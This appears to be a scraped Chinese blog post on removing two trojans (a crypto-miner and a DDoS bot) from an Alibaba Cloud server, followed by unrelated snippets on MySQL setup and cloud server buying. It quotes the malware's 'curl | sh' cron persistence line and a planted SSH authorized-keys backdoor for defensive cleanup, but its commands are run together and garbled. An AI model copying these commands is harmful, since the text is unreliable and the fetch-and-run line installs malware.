接到**說阿里雲上的服務無法訪問,讓我去處理下。最近這個阿里雲伺服器老是不穩定,動不動就無法訪問,正好今天有時間,打算徹底檢查下。
一檢查,發現問題果然很嚴重,簡單說,就是被人種了木馬,而且還不止乙個,暈倒了!
下面把中招以及處理的方法介紹一下,也算是乙個經驗教訓吧。
木馬1:挖礦木馬minerd變種tplink
典型現象就是在系統cpu資源高達100%,但是用top看不到任何異常程序資訊,只有用lsof這個神器了
lsof -c tplink第一步是禁止tplink的自動啟動,需要將所有相關的crontab都刪除
檢查/etc/crontab、/var/spool/cron/root和/var/spool/cron/crontabs/root三個檔案,將以下的自動執行命令刪除(不同的變種命令可能會不同,但都是curl)
/10**
* curl -fssl | sh
kill -9
3068 && rm -rf /usr/sbin/tplink
修改/etc/ssh/sshd_config檔案的最後一行,把木馬指向的信任檔案
authorizedkeysfile .ssh/khk75neoiqauthorizedkeysfile .ssh/authorized_keys/root/.ssh目錄下把木馬的信任檔案刪除
rm -rf /root/.ssh/khk75neoiq木馬2:gcc4.sh
為什麼叫gcc4.sh,因為我也不清楚這個木馬應該叫什麼,先命個名吧。
現象就是你到/var/log/cron日誌中檢視,會發現以下內容
dec
1508:42:01 iz crond[1396]: (root) cmd (/etc/cron.hourly/gcc4.sh)
/etc/crontab
*/3 * * * * root /etc
/cron.hourly/gcc4.sh
然後發現這個木馬會生成乙個10個字母亂碼的程序,例如ypyvjyodov等,和之前的挖礦木馬不一樣,它主要占用的是網路頻寬,估計是用來進行ddos攻擊用的。
直接殺程序又會激發新的程序,而且名稱一直在變,因此先禁止木馬本體的訪問許可權
chattr +i /lib/libudev4.sorm -rf /etc/init.d/kscqqdejrr && chattr +i /etc/init.d/pkill kscqqdejrrchattr -i libudev4.so && rm -rf libudev4.so/etc/rc.d,從rc0.d到rc6.d,乙個乙個來吧 阿里雲伺服器
ssh 使用者名稱 ip位址以下操作都在遠端伺服器上進行操作 ubuntu 16.04 sudo apt get updateapt get install mysql server apt get install libmysqlclient devsudo apt get install red...
阿里雲GPU雲伺服器
既然是基於gpu應用的計算服務,那麼阿里雲的gpu雲伺服器的計算能力又如何呢?計算能力 ga1例項計算性能力 ga1例項最多可提供 4 顆amd s7150 gpu 56 個 vcpu 和 160gb 主機記憶體,以及共計 32gb 的 gpu視訊記憶體 總計提供8192個並行處理核心 最高15 t...
阿里雲伺服器選擇指南,怎樣使用阿里雲伺服器ECS
一 選購阿里雲伺服器之前我們需要了解伺服器的幾個關鍵點,即伺服器配置 伺服器寬頻 伺服器地域節點三部分,伺服器配置要根據使用者實際的使用場景來確定,伺服器寬頻要進行計算選擇合適的寬頻 伺服器地域節點要根據使用者的分布情況選擇,今天我們說說阿里雲伺服器如何選擇吧!伺服器配置是指例項規格如 cpu 記憶...